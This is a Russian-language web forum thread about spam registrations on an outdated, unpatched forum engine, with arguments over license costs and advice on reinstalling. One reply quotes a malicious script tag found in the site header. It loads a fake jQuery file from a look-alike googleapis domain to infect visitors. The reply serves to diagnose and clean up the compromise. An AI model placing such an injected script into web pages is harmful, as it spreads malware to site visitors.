При регистрации задал несколько бан-фильтров по е-мэйл адресам китайских почтовых серверов, с которых у меня последнее время идут регистрации спамеров.

Кейкапча стоит, т.е. регистрацируются, как я понимаю, вручную.

Однако несмотря на наличие бан-фильтров, всё равно новые регистрации проходят с запрещёнными е-мэйлами.

Прошу помощи.

Однако несмотря на наличие бан-фильтров, всё равно новые регистрации проходят с запрещёнными е-мэйлами.

Может у вас доработанный форум?

Как это "доработанный"? Я не знаю ничего об этом...

Стоит пара модов, типа цитаты и глобальных объявлений, т.е. ничего экстраординарного.

У меня автобан срабатывает даже с разных ip или разных емейлов когда спаммер (один и тот же) регается. Кажется регается скриптом, не руками. Также стоит активация аккаунтов администратором. Попробуйте ввести обязательное поле текстовое при регистрации, например: "Введите цель регистрации на форуме", а новые аккаунты активируйте руками. Сейчас фик поймешь, где руками, а где всякими генераторами случайных чисел регистрируются.

Изменено 26 декабря 201213 г пользователем Zero108

У меня стоит активация администратором, но и это не помогает, потому что как-то обходят это ограничение.

Значит, скорее всего, ломаный (null) движок с бэкдором. Для этого их и распространяют.

Нет, лицензионный. Официально покупал у разработчика.

Я не в курсе, что там за дыры были, и какие патчи выпускались. Тут много было про вирусы в ранних версиях 3.0.0. Поищите по форуму, обновите движок. Я пользуюсь с 3.4.0.

обновите движок

это ж денег стоит... А потом через 2 года опять затупит и опять плати за новый?..

Патчи бесплатно раздаются техподдержкой. Стоит удовольствие 70 долларов в полгода.

За эти деньги я себе куплю пожизненный альтернативный форум.

А с такой "техподдержкой" как на ИПБ, когда задаёшь на форуме у них вопрос и в течение недели ни одного ответа - пусть покурят бамбук.

Я так понимаю, по моей проблеме здесь тоже пока толком ничего не может сказать?..

Кстати, вот и ответ пришёл от "техподдержки" насчёт обновления:

> Письмо от: Сергей

>

> Тема: Вопросы по оплате

> Текст сообщения: У меня лицензия на форум давно истекла. Хочу обновить

> движок на свежую версию. Сколько будет стоить обновление?

 

Здравствуйте.

 

Для использования последней версии форума требуется уже англоязычная

лицензия. Русских лицензий с 2011 года не предлагается.

 

Поэтому для обновления вашего форума вам необходимо иметь американскую

лицензию(5000-6000 рублей) + 990 рублей за продление поддержки на русском

языке на 6 месяцев и локализацию...

 

Также мы можем предложить вам наши услуги по обновлению форума под ключ.

Стоимость обновления зависит от размеров форума. Для расчета стоимости

заполните простую анкету (прикреплена к письму).

Считаете это голос разума? На мой взгляд они просто зажрались, так что бамбук для них - лучшее решение.

Скорее всего, что проблему топика решать уже не нужно, я перехожу на альтернативный форум.

Спасибо, тему можно закрыть.

Я так понимаю, по моей проблеме здесь тоже пока толком ничего не может сказать?..

Вам толком по вашей проблеме уже ответили в предыдущей теме, мне лично больше нечего добавить.

 

ПС. Да, кроме всего вам надо установить патч безопасности для недавно обнаруженной уязвимости.

 

За эти деньги я себе куплю пожизненный альтернативный форум.

"Эти деньги" можно было скопить за месяц в сапе

В 3.0.5 больше десятка уязвимостей.

 

Ваш форум однозначно уже протроянен до дыр. А вот этот код в шапке еще и распространяет вирусы среди ваших посетителей:

	<script type="text/javascript" src="http://googleapis.lllil.ru/ajax/libs/jquery/1.8.3/jquery.min.js"></script></head>

 

Вы можете купить себе за 70$ любой пожизненный движок, но речь не в пожизненности, а в регулярном аудите безопасности и обновлениях. Своей безалаберностью и "экономией" вы довели свой форум до состояния, когда его дешевле удалить полностью и начать с нуля, нежели вычистить от накопившейся за несколько лет гадости.

"Эти деньги" можно было скопить за месяц в сапе

Можно быть и повежливей, давая советы о способах заработка.

 

@Ritsuka, имеете в виду удалить вместе с БД?

Подскажите, в каком из файлов находится этот вредоносный код, и можно ли мне его удалить?

Изменено 28 декабря 201213 г пользователем Сергей К.

Ваша версия скрипта не поддерживается уже полтора года. С тех пор, если мне не изменяет память, выходило больше 5 критических патчей "на всю линейку". Плюс неизвестно, ставили ли вы патчи еще на момент, когда поддержка вашей версии не была завершена. Чтобы починить ваш форум, вам потребуется квалифицированный специалист, который:

 

1. Потратит много времени на анализ всех скриптов, файлов и базы данных на предмет посторонних включений (судя по виду внедрения кода, у злоумышленников есть доступ как к файловой системе, так и к базе данных вашего форума).

2. Портирует вниз до вашей версии все патчи безопасности.

3. Пожелает разбираться в откровенно устаревшем скрипте (и будет иметь на руках "чистый" 3.0.5).

 

Вы на таком человеке просто разоритесь. Или прибегните к услугам какого-то школьника, который, конечно, наобещает, что "все будет ок", но в итоге ничего не сможет вам гарантировать.

 

Более логичный сценарий:

1. Взять актуальную версию скрипта (3.3.4 или 3.4.1)

2. Обновиться до нее с предварительным удалением всех старых каталогов и файлов, кроме uploads (которую так же проверить на посторонние .js, .htaccess и .php файлы).

3. Поставить новые версии ваших любимых модов и хуков.

4. Пробежаться по нескольким таблицам в базе на предмет посторонних "хвостов".

 

Это будет куда дешевле, проще и быстрее, много кто с удовольствием возьмется за такую работу и легко справится с нею. Новая версия вашего скина у Фисаны есть, и все свежие патчи прилетят к вам вместе с дистрибутивом. А старые скрипты забудете как страшный сон.